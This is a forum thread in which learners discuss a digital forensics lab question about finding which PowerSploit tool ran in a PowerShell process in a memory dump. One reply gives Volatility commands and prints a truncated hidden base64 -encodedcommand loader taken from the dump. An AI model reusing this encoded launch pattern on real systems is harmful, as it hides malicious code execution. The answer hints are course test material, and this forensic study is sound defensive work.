Practical Digital Forensics Scenario

LukasD12 · June 17, 2024, 8:41pm

Hi guys,
I’m struggling with this one.

Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework) has been utilized within the process, and enter its name as your answer.

I noted that command was triggered with base64 encdoing, so the answer should be (I assume) copy and pasted from github link provided, but I’m not able to progress at all.

Any hints?

LukasD12 · June 18, 2024, 8:43am

Encoded command needs can be decoded to reveal the answer. Its name of one of techniques available on the webpage, staring with P.

5amu3l · July 5, 2024, 10:55am

Am also stuck here. Any guide please

LukasD12 · July 5, 2024, 11:48am

Try this way - It performs network enumeration and exploitation.

shadowRrt · July 13, 2024, 7:21pm

I found the answer, but I need to validate the answer. Can someone explain how we arrive to both answers for the questions in the section.

salt418 · July 15, 2024, 9:44pm

Hi. I found the solution but I just guessed it. I found the power shell with the base64 and when I decoded it, I finally find an executable code but nothing about the module used.

LukasD12 · July 16, 2024, 6:56am

That’s the problem with some of the modules, I didn’t liked it. I completed the entire blue team course, if got stuck feel free to reach me via PM.

5amu3l · July 26, 2024, 8:33am

hello. I need assistance kindly. I have been stuck here for days: (Practical Digital Forensics Scenario)
Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework) has been utilized within the process, and enter its name as your answer.

LukasD12 · July 26, 2024, 8:45am

Please check all the answers provided in this thread, there’s many hints.

xenoxavier · August 18, 2024, 6:18am

I just finished this a while ago,
First identify any PowerShell commands or scripts executed by the process with PID 6744 in a memory dump, you can use Volatility’s windows.cmdline

command -
python vol.py -f …\memdump\PhysicalMemory.raw windows.cmdline.CmdLine | findstr 6744

it will show you the result with something like this -

C:\Users\johndoe\Desktop\volatility3-develop>python vol.py -f …\memdump\PhysicalMemory.raw windows.cmdline.CmdLine | findstr 6744
6744 powershell.exe “PowerShell.exe” -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAVwBhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADIAZwBKAFUAQgBNAEcAYgBDAEQATgBHADcAWAAwAEQATQBiAHMAUwB5AEEAcwBkAGwANABVAGwAYwB1AEYASwBlAEsAMQBYAEEAYgBEAG0ALwBmAGYANQA1AGEAQgBkAEgAbwA2AFAAZABQAFMAegBFAFMASwBxAEgATABkADUAZABTADUAUwA5ADAANQA0AFgAZA

second - this is based 64, decode it using any tool like, powershell, cyberchef or burpsuite. me i ask chatgpt to decode it for me. then i ask gpt to explain it to,

third - look for the result in the github repo

shahenda · August 25, 2024, 11:40am

I have reached out that the result is Out-EncodedCommand but don’t know why it’s not accepting it any other hints

LukasD12 · August 25, 2024, 9:10pm

It’s simpler than this, just use the provided site with metasploit tools and try to find adequate tools name that „performs network enumeration and exploitation”.

This question isn’t ideal.